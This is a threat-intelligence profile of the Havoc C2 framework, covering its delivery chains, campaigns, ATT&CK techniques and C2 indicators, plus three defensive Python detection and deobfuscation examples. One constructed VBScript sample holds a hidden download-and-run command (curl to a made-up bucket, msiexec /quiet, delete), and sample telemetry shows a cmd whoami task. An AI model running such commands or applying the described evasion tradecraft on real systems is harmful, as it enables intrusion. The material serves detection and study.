Havoc
Havoc is an open-source post-exploitation command-and-control framework, also referred to as Havoc C2, that threat actors increasingly use as an alternative to Cobalt Strike, Sliver, and Brute Ratel. Its implant is commonly called Demon. Reported capabilities include HTTP/HTTPS and SMB-based C2, AES-encrypted check-ins, command execution via cmd.exe and PowerShell, file upload and download, screenshot capture, process and host enumeration, network enumeration, token impersonation, proxying, named-pipe communication, process injection using NtAllocateVirtualMemory and NtCreateThreadEx, DLL spawn/injection, and configurable sleep timing for evasion. Reporting also describes evasion features such as indirect syscalls, sleep obfuscation (Ekko sleep masking), AMSI/ETW patching, stack spoofing, and anti-forensic options in some observed builds.
Observed delivery and execution chains include phishing and ClickFix lures, ZIP archives containing decoy documents and malicious screen-saver files, DLL sideloading through trusted signed binaries, encrypted configuration staged in the registry and decrypted at runtime, and software update abuse. In a Brazil-focused phishing campaign, a VBScript in a fake NF-e invoice ZIP downloaded an MSI from Google Cloud Storage that installed a legitimate Microsoft-signed mpextms.exe alongside a malicious endpointdlp.dll stager. That stager retrieved the Havoc Demon over the network, used a Microsoft-Delivery-Optimization/10.1 user-agent, contacted 194.59.31.192:8443 with GET /stage/<32-hex> followed by POST /api/v2/telemetry/diag, and persisted via HKCU\Environment\UserInitMprLogonScript pointing to mpextms.exe. Recovered stager configuration included GET /stage/, POST /api/v2/telemetry/diag, mutex Global{7f3a9c2e-4b1d-8e5f-a6d0-3c9b2e1f7a4d}, and strings including phantom.local and 0123456789abcdef. Recovered Demon configurations included C2 values such as 143.198.183.46, 194.62.55.81:80, and a private test address 192.168.12.228, with HTTP POST to / or /api and a Chrome-like user-agent.
Havoc has also been observed in Microsoft Teams/Quick Assist social-engineering intrusions, where attackers used DLL sideloading with binaries such as ADNotificationManager.exe, AcroServicesUpdater2_x64.exe, DlpUserAgent.exe, and werfault.exe, with encrypted configuration stored in the registry and outbound HTTPS C2 over TCP 443. In multiple incidents, ADNotificationManager.exe sideloaded a Havoc payload named vcruntime140_1.dll, after which attackers used Rclone for exfiltration. Sophos reported Chinese state-directed Operation Crimson Palace deploying Havoc on compromised web application servers, including a malicious Havoc DLL injected into backgroundtaskhost.exe and later Havoc payloads delivered through multiple sideloading chains. Check Point reported Operation TrueChaos, in which attackers exploited TrueConf Client CVE-2026-3502 by replacing update packages on compromised on-premises TrueConf servers used by government entities in Southeast Asia; the malicious updates delivered Havoc for reconnaissance, persistence, surveillance, and C2. Check Point linked that campaign with moderate confidence to a China-aligned or Chinese-nexus actor. Sophos Counter Threat Unit (CTU) reporting also ties Havoc use to the financially motivated GOLD ENCOUNTER / PayoutsKing operation, which used DLL sideloading to launch Havoc and then exfiltrated data with WinSCP or Rclone.
Targeting described in the content includes government organizations, public-sector entities, Southeast Asian government networks, Brazilian organizations during tax season, and victims of ransomware or extortion intrusions. Specific artifacts mentioned include demon.x64.dll with SHA-256 ef73a528e37f30fd84d41763b7f62f972407ec5ad6754ed86576a3bebbc053a7 and MD5 0c883112be08398d5bbc686a933ac6bc, observed Havoc injection into C:\Windows\System32\Werfault.exe, and use of registry-backed encrypted configuration to survive reboots or remediation attempts.
Vulnerabilities exploited
3 CVEs correlated with this family across public research and vendor advisories.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a flaw in TrueConf Client, tracked as CVE-2026-3502 (CVSS score of 7.8), to its Known Exploited Vulnerabilities (KEV) catalog. CVE-2026-3502 is a flaw in TrueConf Client that allows it to download and install updates without verifying them. Attackers who can tamper with the update source can deliver malicious files, leading to arbitrary code execution on the system.
Attackers replaced update files with malicious ones, tricking users into installing them. This delivered the Havoc framework, enabling control, surveillance, and persistence.
Researchers at Sophos recently discovered that in mid-2025, Bronze Butler (a.k.a. Tick, RedBaldKnight, Stalker Panda, Swirl Typhoon) exploited a critical vulnerability in Lanscope when it was still a zero-day... Motex disclosed a vulnerability designated CVE-2025-61932... Motex has released a fix... CISA added CVE-2025-61932 to its Known Exploited Vulnerabilities (KEV) catalog.
Attack chains mounted by the adversary have been found to abuse CVE-2025-8088, a now-patched security flaw impacting RARLAB WinRAR that allows for arbitrary code execution when specially crafted archives are opened by targets. The exploitation of the vulnerability was observed about eight days after its public disclosure in August.
Groups observed using it
19 distinct threat actors attributed by public researchers.
The group has also used a DLL sideloading technique to launch the Havoc C2 post-exploitation framework, and establishes an SSH backdoor via AdaptixC2 or OpenSSH.
Havoc C2 for post-exploitation tasks like pivoting through compromised hosts into internal networks, privilege escalation, and maintaining stealth
The TrueChaos campaign has been found to weaponize this flaw in the update mechanism to likely deploy the open-source Havoc command-and-control (C2) framework to vulnerable endpoints.
The group uses a combination of living-off-the-land tools (like ligolo, socat, proxychains) and post-exploitation frameworks (like Havoc, MeshCentral, and custom C2 binaries) across Linux and cloud systems.
What once ended with a $300 gift card purchase now ends with a modified Havoc C2 framework burrowed into your environment... deploying a mix of custom Havoc Demon payloads...
"...used to execute the Havoc command-and-control (C2) framework."
The attack is also characterized by the deployment of the Havoc post-exploitation framework on select systems...
OceanLotus: TahirSec has published a report on a recent OceanLotus (APT32) phishing campaign that drops Havoc payloads.
KugelBlitz, a shellcode loader that's used to deploy the Havoc C2 framework
The final payload deployed as part of the attack is the open-source command-and-control (C2 or C&C) framework known as Havoc.
Lastly, some operators started experimenting with the Havoc C2 framework in March 2025, to supplement their tooling.
"...downloads and executes an additional payload, most commonly Havoc."
ShadowSyndicate continues to be associated with toolkits including Cobalt Strike, Metasploit, Havoc, Mythic, Sliver, AsyncRAT, MeshAgent, and Brute Ratel.
"The primary C2 frameworks observed were Cobalt Strike, VShell, Havoc, Sliver, and SparkRat."
"Pakistani hackers used vibeware as a 'hybrid' fallback for well-known tools such as the open-source Havoc framework for command and control..."
Nearly half a dozen organizations have been targeted with the Havoc command-and-control framework for subsequent data theft or ransomware compromise in a new IT support scam campaign.
This evolution includes the use of the Rust programming language, a departure from previous reliance on traditional compiled languages and frameworks like Cobalt Strike and Havoc.
"...borrowed adversary simulation frameworks such as Cobalt Strike, Havoc..." and "...components associated with the Havoc post-exploitation C2 framework... Havoc shellcode payload..."
Techniques & procedures
34 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
5 techniques
Most infections likely began through a link sent to the victims. The links launched the TrueConf client and showed an update prompt alleging that there is a newer version available.
CVE-2026-3502 is a flaw in TrueConf Client that allows it to download and install updates without verifying them. Attackers who can tamper with the update source can deliver malicious files, leading to arbitrary code execution on the system.
Havoc has also been employed in connection with a fraudulent npm module dubbed aabquerys that, once installed, triggers a three-stage process to retrieve the Demon implant.
The attack sequence documented by Zscaler begins with a ZIP archive that embeds a decoy document and a screen-saver file that's designed to download and launch the Havoc Demon agent on the infected host.
MITRE ATT&CK ID Technique T1566.002 Phishing: Spearphishing Link
Execution
9 techniques
the injected process used WMIC to query Windows Defender exclusion paths... the attackers used a command shell session spawned from the malicious DLL to move laterally via WMIC
The atexec module was used to remotely configure a scheduled task on the targeted system... schtasks /create /tn \Microsoft\Windows\Clip2
Attackers replaced update files with malicious ones, tricking users into installing them. This delivered the Havoc framework, enabling control, surveillance, and persistence.
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
The VBS hides its intent behind string splitting. Deobfuscated, the VBS launches a hidden cmd that downloads the MSI from Google Cloud Storage with curl, runs it with msiexec /quiet /norestart, and deletes the file
the open-source Havoc framework is an advanced post-exploitation command-and-control framework capable of bypassing the most current and updated version of Windows 11 defender due to the implementation of advanced evasion techniques such as indirect syscalls and sleep obfuscation
CISA’s confirmation that the vulnerability is being exploited follows a report from cybersecurity researchers at Check Point outlining an alleged Chinese hacking campaign targeting governments in Southeast Asia. Check Point said Chinese hackers have been exploiting the vulnerability in a campaign they call TrueChaos.
The infections began when TrueConf client application launched, probably by a link sent to the target from the attacker. This link launched the already installed TrueConf client and presented an update prompt claiming that a newer version was available.
Persistence
4 techniques
At first execution, the stager writes: HKCU\Environment\UserInitMprLogonScript = <path to mpextms.exe>
The atexec module was used to remotely configure a scheduled task on the targeted system... schtasks /create /tn \Microsoft\Windows\Clip2
In this campaign, sideloaded modules acted as intermediary loaders that decrypted hidden configuration data stored inside the Windows registry rather than writing anything suspicious to disk.
Using previously stolen credentials, the attackers deployed a web shell to a web application server using its built-in file upload feature.
Privilege Escalation
3 techniques
At first execution, the stager writes: HKCU\Environment\UserInitMprLogonScript = <path to mpextms.exe>
The atexec module was used to remotely configure a scheduled task on the targeted system... schtasks /create /tn \Microsoft\Windows\Clip2
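The two persistence artifacts quoted in the Persistence and Privilege Escalation sections (the HKCU\Environment\UserInitMprLogonScript value written by the stager, ATT&CK T1037.001, and the \Microsoft\Windows\Clip2 scheduled task created remotely with atexec) can be hunted from endpoint telemetry. The following is an added example and is not code from the reporting, from Impacket, or from the Havoc project: it triages constructed records modelled on Sysmon Event ID 13 (registry value set) and Security Event ID 4698 (scheduled task created). The hostnames, SIDs, users and the benign records are made up, and the rule that Microsoft's built-in tasks always sit in a subfolder of \Microsoft\Windows\ is a heuristic assumed by the example.

```python
import re

# Constructed telemetry records modelled on Sysmon Event ID 13 (registry value set) and
# Security Event ID 4698 (scheduled task created). Hostnames, SIDs, users and the benign
# records are made up; the UserInitMprLogonScript value and the \Microsoft\Windows\Clip2
# task name are the artifacts the reporting describes.
SAMPLE_EVENTS = [
    {"event_id": 13, "host": "ws-014", "image": r"C:\ProgramData\EndpointDLP\mpextms.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Environment\UserInitMprLogonScript",
     "details": r"C:\ProgramData\EndpointDLP\mpextms.exe"},
    {"event_id": 13, "host": "ws-014", "image": r"C:\Windows\explorer.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Environment\Path",
     "details": r"C:\Users\jdoe\bin"},
    {"event_id": 4698, "host": "srv-app-02", "subject": r"CORP\svc-backup",
     "task_name": r"\Microsoft\Windows\Clip2",
     "command": r"C:\Windows\System32\cmd.exe",
     "arguments": r"/C whoami > C:\Windows\Temp\out.tmp 2>&1"},
    {"event_id": 4698, "host": "srv-app-02", "subject": r"NT AUTHORITY\SYSTEM",
     "task_name": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "command": r"%windir%\system32\defrag.exe", "arguments": "-c -h -o -$"},
]

# Sysmon records HKCU values under HKU\<SID>\..., so match on any user hive.
LOGON_SCRIPT = re.compile(r"^HKU\\[^\\]+\\Environment\\UserInitMprLogonScript$", re.IGNORECASE)
# Heuristic (an assumption of this example, not a statement from the reporting): Microsoft's
# built-in tasks live in a subfolder of \Microsoft\Windows\, so a task created directly in that
# folder, as \Microsoft\Windows\Clip2 was, is unusual.
SHALLOW_MS_TASK = re.compile(r"^\\Microsoft\\Windows\\[^\\]+$", re.IGNORECASE)
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "mshta.exe"}


def triage(events):
    """Return one finding per suspicious event as (host, severity, rule, evidence)."""
    findings = []
    for ev in events:
        if ev["event_id"] == 13 and LOGON_SCRIPT.match(ev["target"]):
            # Whatever this value names runs at every interactive logon; the stager pointed it at mpextms.exe.
            findings.append((ev["host"], "high", "UserInitMprLogonScript set",
                             f'{ev["target"]} -> {ev["details"]} (by {ev["image"]})'))
        elif ev["event_id"] == 4698:
            reasons = []
            if SHALLOW_MS_TASK.match(ev["task_name"]):
                reasons.append("task created directly under \\Microsoft\\Windows")
            image = ev["command"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
            if image in SHELL_IMAGES:
                reasons.append(f"task action is a script/shell host ({image})")
            if reasons:
                severity = "high" if len(reasons) > 1 else "medium"
                findings.append((ev["host"], severity, "; ".join(reasons),
                                 f'{ev["task_name"]} -> {ev["command"]} {ev["arguments"]} (by {ev["subject"]})'))
    return findings


if __name__ == "__main__":
    for host, severity, rule, evidence in triage(SAMPLE_EVENTS):
        print(f"[{severity}] {host}: {rule}: {evidence}")
```

The registry rule needs no allowlist: UserInitMprLogonScript is rarely set in a managed estate, so any write is worth a look. The task rule is deliberately two-factor (odd placement plus a shell-host action) so that a legitimately placed task that happens to run cmd.exe, or an oddly placed task that runs a normal binary, only reaches medium severity.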
Stealth
9 techniques
Encrypted C2 traffic. A fresh AES key is negotiated at first contact; all later traffic is encrypted.
allowing attacker-supplied modules to run under a trusted execution context from non-standard paths.
The MSI also has no digital signature ... Only mpextms.exe is signed. The stager DLL is not.
The next step is an MSI that pretends to be a Microsoft update ... Microsoft Endpoint DLP Module ... Inside the installer are two programs: mpextms.exe ... endpointdlp.dll ... Side by side, the MSI and DLL look like one Microsoft bundle.
using a custom malware loader called HUI loader to inject a Cobalt Strike beacon into the Remote Desktop utility mstsc.exe... attackers used the Havoc tool to inject code into other processes
The VBS hides its intent behind string splitting. Deobfuscated, the VBS launches a hidden cmd that downloads the MSI from Google Cloud Storage
Deobfuscated, the VBS launches a hidden cmd that downloads the MSI from Google Cloud Storage with curl, runs it with msiexec /quiet /norestart, and deletes the file
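The VBScript string-splitting described here and in the Execution section (the loader that launches a hidden cmd, downloads the MSI with curl, runs msiexec /quiet /norestart and deletes the file) can be undone mechanically rather than by hand. The following is an added example, not code from the reporting or from the Havoc project: it folds a VBScript expression built from concatenated literals, Chr() calls and variables back into one string, tracks assignments, and recovers what is handed to WScript.Shell.Run together with the window-style argument. The script it parses is a constructed stand-in modelled on the described behaviour; the bucket name, file names and variable names are made up.

```python
import re

# Constructed sample modelled on the "string splitting" the report describes.
# It is NOT the real NF-e script: bucket, file and variable names are made up.
SAMPLE_VBS = r'''
Dim a, b, c
a = "cm" & "d.e" & "xe /c cu" & Chr(114) & "l -s https://storage.googleapis.com/ex" & "ample-bucket/upd.m" & "si -o %TEMP%\upd.msi"
b = "msie" & "xec /i %TE" & "MP%\upd.msi /qu" & "iet /norest" & "art"
c = "del /f /q %TE" & "MP%\upd.msi"
Set sh = CreateObject("WScript.Shell")
sh.Run a, 0, True
sh.Run b & " & " & c, 0, True
'''

# One token of a VBScript concatenation: a quoted literal ("" escapes a quote),
# Chr()/ChrW() with a numeric argument, an identifier, the & operator, or whitespace.
_TOKEN = re.compile(r'"((?:[^"]|"")*)"|Chr[Ww]?\((\d+)\)|([A-Za-z_]\w*)|(&)|(\s+)')
_ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
_RUN = re.compile(r'\.Run\s+(.+?)\s*$', re.IGNORECASE)


def fold_expr(expr, env):
    """Evaluate an expression made only of string literals, Chr(), known variables and &."""
    parts, pos = [], 0
    for m in _TOKEN.finditer(expr):
        if m.start() != pos:  # a gap means syntax this folder does not handle
            raise ValueError(f"unsupported syntax near: {expr[pos:]!r}")
        pos = m.end()
        literal, code, ident, _amp, _ws = m.groups()
        if literal is not None:
            parts.append(literal.replace('""', '"'))
        elif code is not None:
            parts.append(chr(int(code)))
        elif ident is not None:
            parts.append(env.get(ident, f"<{ident}>"))  # unknown variable stays visible
    if pos != len(expr):
        raise ValueError(f"unsupported syntax near: {expr[pos:]!r}")
    return "".join(parts)


def _split_args(arglist):
    """Split an argument list on commas that are outside quotes and parentheses."""
    args, buf, depth, in_str = [], [], 0, False
    for ch in arglist:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == "," and depth == 0:
                args.append("".join(buf).strip())
                buf = []
                continue
        buf.append(ch)
    args.append("".join(buf).strip())
    return args


def deobfuscate(script):
    """Return [(command, hidden)] for every WScript.Shell.Run call, resolving variables in order.

    hidden is True when the window-style argument is 0, i.e. the console is not shown.
    """
    env, commands = {}, []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.lower().startswith(("dim ", "set ", "'")):
            continue
        m = _RUN.search(line)
        if m:
            args = _split_args(m.group(1))
            hidden = len(args) > 1 and args[1] == "0"
            commands.append((fold_expr(args[0], env), hidden))
            continue
        m = _ASSIGN.match(line)
        if m:
            env[m.group(1)] = fold_expr(m.group(2), env)
    return commands


if __name__ == "__main__":
    for cmd, hidden in deobfuscate(SAMPLE_VBS):
        print(("[hidden] " if hidden else "[visible] ") + cmd)
```

The folder refuses anything it does not understand instead of guessing, so a script that also uses Replace(), StrReverse() or Execute() will raise and point at the construct that needs a new rule; that is preferable to a silently wrong command line.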
the open-source Havoc framework is an advanced post-exploitation command-and-control framework capable of bypassing the most current and updated version of Windows 11 defender due to the implementation of advanced evasion techniques such as indirect syscalls and sleep obfuscation
Defense Impairment
1 technique
Discovery
4 techniques
deploy the open-source SharpHound tool for Active Directory infrastructure mapping
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
the open-source Havoc framework is an advanced post-exploitation command-and-control framework capable of bypassing the most current and updated version of Windows 11 defender due to the implementation of advanced evasion techniques such as indirect syscalls and sleep obfuscation
Command and Control
5 techniques
T1071 Application Layer Protocol: C2 disguised as HTTP/HTTPS/DNS traffic
When we ran the DLL in a sandbox with internet access, the behavior matched exactly: it issued GET /stage/<32-hex> and then POST /api/v2/telemetry/diag against 194[.]59[.]31[.]192:8443, using the Microsoft-Delivery-Optimization/10.1 user-agent.
In MITRE ATT&CK terms these are specific techniques: Proxy (T1090, Command and Control): routing C2 traffic through an intermediate node
The DLL we recovered is just a stager: its only job is to reach out to the C2 server and download the demon over the network. The demon never exists on disk.
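The stager's network behaviour quoted above (and in the summary) is specific enough to hunt statefully in proxy logs: a Microsoft-Delivery-Optimization user-agent going to a host that is not Microsoft's, a GET for /stage/<32-hex>, and then POST /api/v2/telemetry/diag from the same client to the same host. The following is an added example, not code from the reporting or from the Havoc project. The log lines are constructed (the malicious host, paths and user-agent are the ones reported; clients, timestamps and the benign lines are made up), the simple space-separated log format is chosen for the example, and the rule that genuine Delivery Optimization traffic only goes to Microsoft-owned hosts is an assumption of the example, not a claim from the reporting.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed proxy log lines: timestamp client method url status "user-agent".
# Host, paths and user-agent on the malicious lines come from the report; everything else is made up.
SAMPLE_LOG = '''\
2025-03-12T14:02:11Z 10.0.5.23 GET http://dl.delivery.mp.microsoft.com/filestreamingservice/files/abc 200 "Microsoft-Delivery-Optimization/10.0"
2025-03-12T14:03:40Z 10.0.5.23 GET http://194.59.31.192:8443/stage/0123456789abcdef0123456789abcdef 200 "Microsoft-Delivery-Optimization/10.1"
2025-03-12T14:03:41Z 10.0.5.23 POST http://194.59.31.192:8443/api/v2/telemetry/diag 200 "Microsoft-Delivery-Optimization/10.1"
2025-03-12T14:05:02Z 10.0.7.8 GET https://www.example.com/stage/not-a-hash 200 "Mozilla/5.0"
2025-03-12T14:06:13Z 10.0.9.4 GET http://203.0.113.5/stage/00112233445566778899aabbccddeeff 200 "Microsoft-Delivery-Optimization/10.1"
'''

LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
STAGE_PATH = re.compile(r"^/stage/[0-9a-f]{32}$")
CHECKIN_PATH = "/api/v2/telemetry/diag"
DO_UA = re.compile(r"^Microsoft-Delivery-Optimization/")
# Assumption of this example: real Delivery Optimization traffic goes to Microsoft-owned hosts.
MS_HOST = re.compile(r"\.(microsoft\.com|windowsupdate\.com|windows\.net)$", re.IGNORECASE)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the format."""
    m = LINE.match(line)
    if not m:
        return None
    ts, client, method, url, status, ua = m.groups()
    u = urlparse(url)
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "client": client,
            "method": method.upper(), "host": u.netloc,  # netloc keeps the port, e.g. 194.59.31.192:8443
            "path": u.path, "status": int(status), "ua": ua}


def hunt(log_text, window=timedelta(minutes=10)):
    """Return (client, host, severity, reason) findings.

    A GET /stage/<32-hex> followed within `window` by POST /api/v2/telemetry/diag from the
    same client to the same host is the high-confidence sequence; the single indicators
    are reported at lower severity so they can be reviewed on their own.
    """
    findings = []
    stage_seen = {}  # (client, host) -> time of the stage download
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        key = (ev["client"], ev["host"])
        hostname = ev["host"].split(":")[0]
        if DO_UA.match(ev["ua"]) and not MS_HOST.search(hostname):
            findings.append(key + ("medium", "Delivery Optimization user-agent to non-Microsoft host"))
        if ev["method"] == "GET" and STAGE_PATH.match(ev["path"]):
            stage_seen[key] = ev["ts"]
            findings.append(key + ("medium", "GET /stage/<32-hex> stager download"))
        elif ev["method"] == "POST" and ev["path"] == CHECKIN_PATH:
            seen = stage_seen.get(key)
            if seen is not None and timedelta(0) <= ev["ts"] - seen <= window:
                findings.append(key + ("high", "stage download followed by /api/v2/telemetry/diag check-in"))
            else:
                findings.append(key + ("low", "POST /api/v2/telemetry/diag without a preceding stage download"))
    return findings


if __name__ == "__main__":
    for client, host, severity, reason in hunt(SAMPLE_LOG):
        print(f"[{severity}] {client} -> {host}: {reason}")
```

Keying the state on (client, host) rather than on the client alone keeps two unrelated servers from being correlated, and the time window bounds the memory the hunt needs when run over a large log.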
Cobalt Strike uses a command-line interface to interact with systems. Brute Ratel C4 can use cmd.exe for execution. Havoc can execute commands via cmd.exe. Covenant provides access to a Command Shell in Windows environments for follow-on command execution and tasking.
Exfiltration
1 technique
Exfiltration of data of intelligence value was still an objective after the resumption of activity.
IOCs tracked for this family
67 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
77 sources tracked across advisories, community write-ups, and news.
An open-source post-exploitation framework used here as the final in-memory implant ('demon'). The campaign uses a stager DLL masquerading as Microsoft Defender DLP to fetch Havoc over the network at runtime, enabling command execution, screen monitoring, persistence, encrypted C2, sleep masking, indirect syscalls, and AMSI/ETW patching.
Mentioned as an HTTP-based command-and-control framework whose network flow features can be disguised to evade ML-based IDS detection.
Command-and-control framework/implant discussed in the context of periodic beaconing and traffic shaping for evasion.
An intrusion/C2 framework associated here with registry-backed encrypted configuration storage and command-and-control activity over HTTPS, used to maintain covert access and execute malicious code via DLL side-loading.